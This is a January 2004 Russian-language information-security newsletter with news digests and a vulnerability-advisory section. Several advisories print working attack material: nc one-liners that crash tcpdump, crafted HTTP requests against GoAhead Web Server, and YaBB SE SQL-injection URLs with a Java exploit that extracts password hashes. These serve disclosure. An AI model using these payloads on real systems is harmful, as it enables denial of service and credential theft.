Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Содержание
- Исследования, открытия, лабораторные разработки
- Регулирование: Законы, постановления, сертификация, контроль
- Проблемные ситуации, информационная преступность, сетевые войны
- Технологии безопасности. Организации разработчики, интеграторы.
- Информационая безопасность государственной власти
- Информационая безопасность общественной коммуникации, личности.
- Дыры и патчи программ и операционных сред
Исследования, открытия, лабораторные разработки |
Абоненты хотят прятаться
21 января | asteraНЬЮ-ЙОРК - Современные технологии сотовой связи
позволяют оператору определить местонахождение обладателя телефона, и такая
возможность слежки всерьез тревожит абонентов. В ответ на эти опасения компания
Bell Labs, подразделение Lucent Technologies, разработала технологию, с помощью
которой, как утверждается, абонент сможет сам определять степень открытости
информации о его местонахождении.
На этой неделе представители Bell планируют
представить новую технологию и осветить ее аспекты, связанные с пропускной
способностью, пользовательской конфиденциальностью и возможностями настройки в
условиях реально функционирующих телефонных сетей. Настройка в данном случае
означает задание полной информации о том, какая информация о местонахождении
абонента доступна посторонним, а также когда она доступна, при каких условиях и
кому именно. Предполагается, что с помощью этой технологии операторы
беспроводных сетей будут создавать новые виды услуг, "зависимых от
местонахождения" и обеспечивающих абонентам дополнительные удобства.
Один
из американских операторов, AT&T Wireless Services, уже включил в свой пакет
услугу "Найди друзей", в чем-то похожую на адресную книгу в службах мгновенного
обмена сообщениями, однако в целом сервис, связанный с определением текущего
местонахождения, пока не получил развития.
Не так давно определенный
прогресс в этой области был достигнут благодаря федеральному закону, согласно
которому сотовые операторы должны иметь возможность определять нахождение
абонентов, звонящих в службу спасения "911". Операторам пришлось провести
дорогостоящую модернизацию своих сетей, и теперь они заинтересованы в том, чтобы
использовать новую функцию для получения дохода. К примеру, рестораны и другие
предприятия такого рода могут посылать на телефоны оказывающихся поблизости
абонентов SMS-сообщения с приглашением, сотрудники организаций могли бы быстрее
связываться друг с другом или с клиентами и т. д. Многие абоненты были бы не
против получать такие оповещения, хотя в большинстве случаев они, вероятно,
предпочтут не светиться, делая информацию о себе доступной
окружающим.
Кроме того, обеспечение настоящей гибкости подобных служб в
режиме реального времени сопряжено с немалыми техническими трудностями: если
предоставить клиенту возможность оперативно указывать, кто, когда и при каких
условиях может его обнаружить, то число опций при этом окажется небольшим. Одним
из решений здесь может стать создание в сети баз данных по сервисам, в которых
каждая опция была бы снабжена переключателем "включен -
выключен".
Инженеры из Bell утверждают, что их программная система
основана на наборах правил, делающих персонализацию настроек более гибкой и при
этом позволяющих не перегружать телефонную сеть. Большинству абонентов столь
гибкая система, вероятно, не понадобится, но для операторов она может оказаться
полезной.
"Всегда может найтись продвинутый пользователь, желающий
задействовать все имеющиеся функции и полностью настроить свой телефон на
различные условия, - говорит Рик Халл, директор подразделения исследований в
области сетевых технологий и услуг Bell. - Например, бизнесмен может обеспечить
своей жене возможность с предельной точностью отслеживать его перемещение, а
другим предоставлять сведения с точностью лишь до 20 км".
Bell объявила,
что ведет с рядом сотовых операторов переговоры о пробной эксплуатации новой
технологии. Ожидается, что коммерческие продукты на ее основе появятся в будущем
году. (DJ, 19. 01. 2004, Александр Сафин)
Регулирование: Законы, постановления, сертификация, контроль |
Microsoft урегулировала еще один патентный иск
21 января | ibusinessКорпорация Microsoft во вторник урегулировала еще один патентный иск, поданный против софтверного гиганта малоизвестной нью-йоркской компанией E-Data в октябре прошлого года. Напомним, что E-Data обвинила Microsoft, а также провайдера Tiscali и музыкальную фирму On Demand Distribution (OD2) в нарушении европейского патента за номером EP 0 195 098 B-1, выданного еще в 1985 году.
Патент описывает технологию передачи информации в удаленную точку с последующей записью на какой-либо носитель. Подобная схема используется сервисом Tiscali Music Club, через который клиенты (естественно, за определенную плату) могут загружать музыкальные записи на портативные CD- и МР3-плееры. Причем обязательным условием, необходимым для работы со службой Tiscali Music Club, является наличие программного проигрывателя Microsoft Windows Media Player. Свой иск против Microsoft, Tiscali и OD2 компания E-Data подала на территории Германии, поскольку в Соединенных Штатах патент уже потерял силу. И вот вчера стало известно, что ответчикам удалось договориться с руководством E-Data. Правда, какие-либо подробности достигнутого соглашения не раскрываются.
Нужно заметить, что на территории Европы, помимо Tiscali Music Club, функционируют и другие онлайновые музыкальные магазины, и многие из них уже начали получать предупреждения от E-Data по поводу нарушения патента. Кроме того, в ближайшее время должна быть запущена европейская версия сервиса Apple iTunes Music Store. По всей видимости, владельцам таких служб придется выплачивать E-Data лицензионные отчисления.
В поисках исходного кода игры Half-Life 2
21 января | http://www.crime-research.ru/На минувшей неделе ФБР и Секретная служба США провели несколько рейдов в домах
подозреваемых к делу о краже исходного кода игры Half-Life 2, которая
разрабатывается компанией Valve. Напомним, что осенью прошлого года Valve
рассказала о похищении неизвестными хакерами кода одной из самых ожидаемых игр.
Вскоре компания объявила, что из-за утечки кода вынуждена отложить выход игры до
весны 2004 года.
Весть о краже кода вызвала неоднозначную реакцию.
Некоторые комментаторы даже предположили, что утечка кода была сфабрикована
Valve с целью получить формальный повод для задержки выпуска игры. Тем не менее,
американские спецслужбы ведут активный поиск похитителей кода. И, похоже,
следствие напало на какой-то след.
На прошедшей неделе агенты ФБР и
Секретной службы США провели серию обысков в домах участников группы Hungry
Programmers. Один из них, Крис Тошок, рассказал о происшедшем в своем блоге. По
словам Тошока, 14 января в полседьмого утра к нему домой нанесли визит агенты
ФБР и Секретной службы, предъявившие ордер на обыск и изъятие компьютерного
оборудования.
Самому Тошоку и его соседу никаких обвинений предъявлено
не было. Федеральные агенты лишь конфисковали девять компьютеров и массу другого
цифрового оборудования. Судя по предъявленным документам, конфискация техники
была проведена в рамках расследования дела о похищении кода Half-Life 2.
SCO подает иск против компании Novell
21 января | bizon.ruКомпания SCO обратилась в суд Солт-Лейк-Сити (штат Юта) с иском против компании Novell. В иске Novell обвиняется обмане потребителей путем многочисленных публичных заявлений, в которых утверждалось, что именно Novell принадлежат копирайты на ОС Unix System V. SCO считает эти копирайты своими и обвиняет в их нарушении корпорацию IBM и разработчиков ОС Linux. Novell, в свою очередь, с этим не согласна. Кроме этого, в иске SCO говорится, что Novell незаконно подала несколько заявок, связанных с Unix, в американское патентное ведомство. Все эти действия, по мнению юристов SCO, ставят своей целью навредить компании и помешать ей отстаивать права на свою интеллектуальную собственность, то есть Unix. В связи с этим SCO просит суд вынести сначала предварительное, а затем и окончательное решение, пресекающее незаконные действия Novell. В частности, SCO требует от суда предписать Novell отозвать все касающиеся Unix заявки в патентное ведомство, передать SCO все незаконно полученные копирайты и опровергнуть все публичные заявления, затрагивающие интересы компании. Кроме того, SCO требует от Novell компенсации ущерба своим деловой репутации и бизнесу. Как заявляют юристы SCO все претензии Novell безосновательны, так как договор о передаче интеллектуальной собственности на Unix от 1995 года и дополнения к нему предусматривают полную передачу интеллектуальной собственности на Unix от Novell к Santa Cruz Operations. Впоследствии весь связанный с Unix бизнес Santa Cruz Operations выкупила компания Caldera, вскоре сменившая имя на SCO Group. Оставшаяся от Santa Cruz Operations часть была переименована в Tarantella.
Проблемные ситуации, информационная преступность, сетевые войны |
ФБР расследует взлом системы голосований
21 января | news.proext.comМестные и федеральные власти в США, включая ФБР, расследуют вторжение в компьютерную сеть компании, поставляющей программное обеспечение для систем голосования. Основная версия - политические мотивы хакера.
Компания VoteHere во вторник подтвердила сообщение, что в ее сеть в октябре было осуществлено несанкционированное проникновение. Компания идентифицировала подозреваемого и передала дело ФБР, которое и проводит расследование.
История взлома сети VoteHere, сообщенная в понедельник MSNBC и Ассошиэйтед Пресс, вероятно, вызовет оживленные дебаты по безопасности и надежности электронных систем голосования. Однако, шеф пострадавшей компании заверил всех заинтересованных лиц, что вторжение не нарушило работу систем и было быстро обнаружено и пресечено.
Программное обеспечение компании тем временем - наиболее популярно в сфере обеспечения голосований.
Вирусы обращаются к пиринговым сетям
21 января | webplanetАвторы вирусов используют пиринговые сети для
распространения своих творений. Подобная методика усложняет прекращение процесса
распространения вредоносных кодов. По мнению экспертов, p2p сети становятся все
более привлекательными для создателей вирусов.
Способов построения пиринговых сетей — множество, архитектура
с центральным сервером, управляющим другими машинами в сети,
встречается редко. Вместо этого каждый компьютер разделяет бремя организации
системы, и должен предоставлять хранимую информацию прочим звеньям цепи.
Наиболее известные пиринговые сети, такие как Kazaa, используются широкой
аудиторией для поиска музыки, видео и других файлов.
Одним из первых вирусов, использовавших пиринговую сеть для размножения, был
червяк Slapper, ориентированный на ОС Linux. Под Windows вирус, называемый
Sinit, появился в 2003 году. Он превращал каждую зараженную машину
в звено p2p сети. Ожидалось, что создатель Sinit будет использовать
получившуюся сеть для управления зараженными компьютерами. «Это вечная гонка
вооружений между авторами вирусов и антивирусными фирмами. Sinit —
новый дерзкий вызов антивирусным компаниям», — сказал в интервью BBC Пит Симпсон (Pete Simpson) из компании Clearswift, предоставляющей услуги
фильтрации почты.
Раньше некоторые авторы
Кевин Хоган (Kevin Hogan), глава центра антивирусной защиты Symantec Security
Response, грустно шутит: «Хорошей новостью о вирусных пиринговых сетях
является то, что они редки. Это немножко сложнее, чем внедрить „троянского коня“
на единственном сервере». Ситуацию спасает не всегда эффективная передача команд
между машинами распределенной сети и то, что редко используемые порты,
через которые идет обмен информацией, блокируются большинством систем сетевой
защиты. Однако, Хоган считает, что тенденция использования p2p сетей будет
расти.
Технологии безопасности. Организации разработчики, интеграторы. |
Детектор червей от Check Point ведет учет уязвимостям
21 января | securitylab.ruПроизводитель брандмауэров Check Point выпустил устройство для защиты корпоративных сетей от кибератак, использующих известные уязвимости в LAN-протоколах и приложениях. Устройство InterSpect сообщается с регулярно обновляемой базой данных известных уязвимостей, и когда пакеты, связанные с определенным приложением, начинают вести себя подозрительно, перехватывает управление, ставит соответствующий ПК на карантин и предупреждает пользователя о том, что доступ к общей сети временно прекращается — до тех пор, пока компьютер не будет очищен.
Управляющий директор Check Point UK Ник Лав пояснил ZDNet UK, что компании, как правило, защищают свои сети по периметру, и если злоумышленный код занесен вовнутрь (например, через зараженный ноутбук), то возникают проблемы. InterSpect позволяет сегментировать сеть, так что в случае тревоги зоны риска — такие как «зона соприкосновения», где работает много пользователей с ноутбуками, — могут быть быстро изолированы от остальной сети.
«Если в зоне соприкосновения окажется лаптоп, зараженный червем, InterSpect физически отключит это устройство от общей корпоративной сети. Оно будет подключено к другой части сети, которая обеспечивает доступ к необходимым службам для восстановления и очистки ПК», — пояснил Лав.
По его словам, потребность в такой защите вызвана тем, что перед установкой патчей компании обычно выполняют серию тестов, и у злоумышленников есть возможность воспользоваться уязвимостями. Лав приводит в пример MSBlast, использующий уязвимость, о которой было объявлено в апреле 2003 года, а патч для нее опубликовали в июле. Червь MSBlast появился в августе того же года — и, хотя об уязвимости было известно уже несколько месяцев, всю вину возложили на системы, основанные на контрольных сигнатурах. «Ни одна такая система не могла и не сможет обнаружить червя, если он смутировал, — в этом случае их надо опять обновлять», — говорит Лав.
Он уверяет, что, если бы в то время существовала система InterSpect, она обнаружила бы попытку воспользоваться уязвимостью Microsoft, о которой уже было известно. «Мы не разыскиваем известные злонамеренные пакеты — мы выявляем поведение приложений, обращенное к этим уязвимостям. Мы можем заключить, что приложение ведет себя неестественно; следовательно, структура пакетов и их поток злонамеренны, и мы блокируем их».
Аналитическая фирма IDC утверждает, что рынок аппаратуры защиты сетей демонстрирует уверенный рост, но Check Point, вероятно, столкнется с конкуренцией со стороны доминирующих на этом рынке Cisco и NetScreen, доли рынка которых составляют соответственно 27,7% и 20,8%.
InterSpect от Check Point поддерживает протоколы CIFS, MS SQL, DCOM, Sun RPC, DCE RPC, HTTP и др. Продукт поступит в продажу немедленно по цене от 9000 до 39000 долл.
Информационая безопасность государственной власти |
Полиция ищет террористов в интернет-кафе
21 января | http://www.crime-research.ru/Полиция города Бомбей, демонстрируя неустанную заботу о безопасности народа,
будет искать террористов в интернет-кафе.
По информации агентства AP, в
соответствии с новыми правилами пользования интернет-кафе, расположенными на
территории Бомбея, всем посетителям, желающим набрать в адресной строке браузера
заветные буквы «http...», придется предъявлять владельцам заведения документ,
удостоверяющий личность, и указывать свой домашний адрес. В свою очередь,
владельцы интернет-кафе обязаны сохранять собранные сведения в течение одного
года с момента получения и делиться этой информацией с полицией по первому же
требованию. В случае если выяснится, что компьютер, расположенный в кофейне,
использовался хакером, кибер-вымогателем или террористом, владельцев ждет
суровое наказание.
Полицейское начальство объясняет столь резкое
закручивание гаек необходимостью усиления борьбы с террористами, которые, как
известно, днюют и ночуют в пунктах коллективного пользования интернетом.
Административный акт будет предложен на рассмотрение правительства штата
Махараштра в феврале и, по всей видимости, пройдет процедуру утверждения без
каких-либо затруднений. Всего под раздачу попадет около трех тысяч бомбейских
интернет-кафе, которыми пользуются около полутора миллионов человек. Тем не
менее, противники нововведения опасаются, что эта «новаторская инициатива» может
быть с энтузиастом подхвачена властями других штатов и тогда сеть
административного внимания накроет еще как минимум 200 тысяч подобных заведений
по всей стране.
Информационая безопасность общественной коммуникации, личности. |
Интернет — самое увлекательное СМИ
21 января | webplanetНи одно средство массовой информации не может
сравниться с интернетом по количеству постоянных, преданных читателей, то
есть тех, которые тратят на чтение больше часа в день.
В 2001 году 23% взрослых американцев проводили в интернете
7 и более часов. В 2002 году этот процент увеличился до 24,6%,
а в 2003 — до 26,2%, что составляет в абсолютных цифрах
131 млн 417 тыс человек. Рост постоянной аудитории интернета
приобретает особое значение, если сравнить его с постоянными аудиториями
других медиа, которые совсем не растут или даже снижаются.
Таким образом, глобальное мировое медиапространство постепенно перемещается
в интернет, хотя общее количество читателей газет и зрителей ТВ не
уменьшается, однако традиционные СМИ сами все более активно используют Сеть для
расширения своей аудитории. В том числе по этой причине доля постоянных
читателей (американские социологи используют термин «heavy users», что можно
перевести как «увлеченные читатели») растет именно в Сети, а не
у газет или телевидения. Это очень важно, потому что такие люди составляют
самую ценную и качественную часть аудитории любого СМИ.
Увеличение количества активных пользователей интернета «можно рассматривать
как новую возможность для газет и других традиционных медиа, — говорит
президент фирмы International Demographics, Inc., отслеживающей индустрию
средств массовой информации. — В последние
В исследовании The Media Audit приводится
статистика: так, процент «увлеченных» слушателей радио (180+ минут
в день) снизился с 29,7% до 27,5%, а процент «увлеченных»
читателей почтовых бумажных рассылок и рекламных каталогов (которые читают
75% или больше корреспонденции) снизился с 22,4% до 21%. У газет
и телевидения фанатов тоже не прибавляется. Число людей, которые читают
прессу 60+ минут в день, упало с 19,8% до 19,6%, а количество
тех, кто смотрит телевизор 300+ минут в день, возросло незначительно:
с 20,4% до 20,6%.
Другими словами, интернет сейчас является единственным информационным
источником, который вызывает настоящий интерес аудитории и чья аудитория
постоянно расширяется не только количественно, но и качественно, за счет
«увлеченных» читателей.
Важный момент еще заключается в том, что по демографическим показателям
постоянную аудиторию интернета составляют относительно состоятельные люди
с высшим образованием (качество постоянной аудитории радио
и телевидения значительно хуже). Что самое странное, демографические
показатели увлеченных пользователей интернета не меняются по мере увеличения их
численного количества.
Дыры и патчи программ и операционных сред |
Уязвимость в tcpdump в обработке L2TP пакетов
21 января | securitylab.ru
Программа: Tcpdump 3.8.1 и более ранние версии Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в tcpdump в обработке L2TP пакетов. Удаленный пользователь может аварийно завершить работу tcpdump Удаленный пользователь может послать специально обработанный L2TP пакет, не определяя длину параметров, чтобы заставить программу войти в бесконечный цикл или аварийно завершить ее работу. Уязвимость связанна с ошибкой в функции l2tp_avp_print(): perl -e 'print .\x80\x02...\x00.x6 | nc -u 10.1.1.1 1701 perl -e 'print .\x80\x00...\x00.x6 . .\x01.' | nc -u 10.1.1.1 1701 URL производителя: http://www.tcpdump.org Решение:Производитель выпустил обновление, доступное через CVS. |
Повышение локальных привилегий через Ultr@VNC
21 января | securitylab.ru
Программа: Ultr@VNC 1.0.0 RC11 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Ultr@VNC. Локальный пользователь может выполнить команды оболочки, чтобы получить привилегии системы. Локальный пользователь может кликнуть правой клавишей мышки на иконке в трее, чтобы получить доступ к IEXPLORE.EXE с SYSTEM привилегиями. Локальный пользователь может вызвать CMD.EXE, чтобы открыть командную строку с SYSTEM привилегиями. Пример: http://www.secnetops.biz/images/SRT2004-01-17-0425.jpg URL производителя: http://ultravnc.sourceforge.net Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Определение существования файлов на системе в FTP сервере от Pablo Software SolutionsSolutions
21 января | securitylab.ru
Программа: Pablo FTP Server 1.77 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в FTP сервере от Pablo Software Solutions. Удаленный пользователь может определить существование определенного файла на сервере. Удаленный авторизованный пользователь может использовать команду DEL на произвольном файле, расположенном вне FTP root каталога, чтобы определить существование файла. Если файл существует, сервер ответит следующим сообщением: 550 Permission denied.Если не существует, то: 550 File not found. URL производителя: http://www.pablovandermeer.nl/ftp_server.html Решение: Установите обновленную версию программы (1.4): http://www.pablovandermeer.nl/ftp_server.html |
Повышение локальных привилегий через Agnitum's Outpost Firewall
21 января | securitylab.ru
Программа: Agnitum Outpost Firewall 1.0, 2.0 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Agnitum's Outpost Firewall. Локальный пользователь может получить System привилегии. 'outpost.exe', который запускается с SYSTEM привилегиями, позволяет локальному пользователю загрузить CMD.EXE через трей иконку с SYSTEM привилегиями. Пример:
URL производителя: http://www.agnitum.com/download/outpostpro.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Доступ к к опознавательным мандатам базы данных в BUGS
21 января | securitylab.ruДоступ к к опознавательным мандатам базы данных в BUGS
Программа: BUGS до версии 1.2
Опасность: Высокая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в BUGS. Удаленный пользователь может получить доступ к опознавательным мандатам базы данных.
Удаленный пользователь может напрямую запросить 'bugs/userbase_connect.inc' файл, чтобы просмотреть опознавательные мандаты базы данных.
URL производителя: http://bugs-bug-genie.sourceforge.net
Решение: Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=89533
Небезопасное создание временных файлов в Netpbm
21 января | securitylab.ru
Программа: Netbpm 10.19 и более ранние версии Опасность: Низкая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в Netpbm. Локальный пользователь может получить поднятые привилегии на целевой системе. Несколько компонентов netpbm небезопасно создают временные файлы. В результате удаленный пользователь может выполнить нападение символьных ссылок, чтобы перезаписать произвольные файлы на системе с поднятыми привилегиями. URL производителя: http://netpbm.sourceforge.net Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Другие публикации: |
Доступ к защищенным каталогам и файлам в GoAhead Web Server
21 января | securitylab.ru
Программа: GoAhead Web Server 2.1.8 Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в GoAhead Web Server. Удаленный пользователь может получить доступ к некоторым ограниченным каталогам, типа 'cgi-bin'. Удаленный пользователь может представить специально обработанный HTTP Get запрос, чтобы получить доступ к файлам в защищенном каталоге: GET file HTTP/1.0 GET \file HTTP/1.0 GET /\\%5cfile HTTP/1.0 URL производителя: http://www.goahead.com/webserver/webserver.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Удаленное выполнение произвольных команд в Mambo Open Source
21 января | securitylab.ru
Программа: Mambo 4.5, 4.6 Опасность: Критическая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Mambo Open Source. Удаленный пользователь может выполнить произвольные команды на целевой системе. Удаленный пользователь может представить специально обработанное значение для $mosConfig_absolute_path в 'mod_mainmenu.php', чтобы включить и выполнить произвольный PHP код на целевом сервере с привилегиями Web сервера. URL производителя: http://www.mamboserver.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Отказ в обслуживании против GetWare WebCam Live Web Server и GetWare PhotoHost Web Server
21 января | securitylab.ru
Программа: GetWare WebCam Live Web Server 2.01, GetWare PhotoHost Web Server 4.0 Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в GetWare WebCam Live Web Server и GetWare PhotoHost Web Server. Удаленный пользователь может вызвать отказ в обслуживании. Встроенный Web сервер не в состоянии правильно отфильтровать параметр Content-Length. В результате удаленный пользователь может послать около 300 HTTP запросов с отрицательным параметром Content-Length, чтобы аварийно завершить работу Web сервера. Пример/Эксплоит: http://aluigi.altervista.org/poc/wcamdos.zip URL производителя: http://www.getware.com/ph/index.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
DoS против GoAhead Web Server
21 января | securitylab.ru
Программа: GoAhead Web Server 2.1.8 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в GoAhead Web Server в обработке POST запросов. Удаленный пользователь может вызвать условия отказа в обслуживании. Удаленный пользователь может представить POST команду со специально обработанным Content-Length заголовком и затем оборвать подключение перед передачей данных, чтобы заставить сервер войти в бесконечный цикл. Пример: POST / HTTP/1.0 Content-Length: 10 123456789 Пример/Эксплоит: http://aluigi.altervista.org/poc/webpostmem.zip URL производителя: http://www.goahead.com/webserver/webserver.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
SQL инъекция в YaBB SE форуме
21 января | securitylab.ru
Программа: YaBB SE 1.5.4, 1.5.3 и более ранние версии Опасность: Критическая Наличие эксплоита: Да Описание: Уязвимость обнаружена в YaBB SE в 'SSI.php'. Удаленный пользователь может внедрить произвольные SQL команды. Удаленный атакующий может представить специально обработанный URL, чтобы выполнить произвольные команды на основной базе данных. Уязвимость связанна с недостаточной фильтрацией данных, представленных пользователем в параметре ID_MEMEBER в функциях 'recentTopics' и 'welcome'. Пример: http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2) +LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+ lmr.ID_MEN+SELECT+ID_MEMBER,+ memberName,null,passwd,null,passwd,null,null,null,null,null,null+ FROM+yabbse_members+/* http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1) +LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_ME ull,null+FROM+yabbse_members+/* http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2) +GROUP+BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+Эксплоит: /* * YabbSe SQL Injection test code * The code is very ugly but it works OK * Use at your own risk. * compile: * javac yabb.java * exec: * java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1 * parameters are: * java yabb [url with path] [database_prefix] [ID_MEMBER] */ import java.net.*; import java.io.*; public class yabb { public static void main(String[] args) throws Exception { boolean lastChar = false; String Key = ""; for ( int count=1; count <= 32 ; count++) { URL yabbForum = new URL(args[0] + "SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP %20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd,"+count+",1)%20)%20 %20,%20%200%20FROM%20"+args[1]+"members%20WHERE%20ID_MEMBER="+args[2]+"/*"); BufferedReader in = new BufferedReader(new InputStreamReader(yabbForum.openStream())); String inputLine; inputLine = in.readLine(); int pos = inputLine.indexOf("action=im"); int pos2 = inputLine.indexOf(" ", pos + 11); if ( pos < 0 ) { System.out.println("ERROR: The server doesn't return any data"); System.exit(0); } String theNumber = inputLine.substring( pos + 11, pos2); System.out.println(theNumber + "-" + new Character((char)Integer.parseInt(theNumber.trim())).toString()); Key += new Character((char)Integer.parseInt(theNumber.trim())).toString(); in.close(); } System.out.println("Hashed password : " + Key); } URL производителя: http://www.yabbse.org Решение:Установите обновленную версию программы (1.5.5): http://www.yabbse.org/download.php |
Инструменты управления содержанием Метод.ру
Дата создания документа: 17:18 21.01.04
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||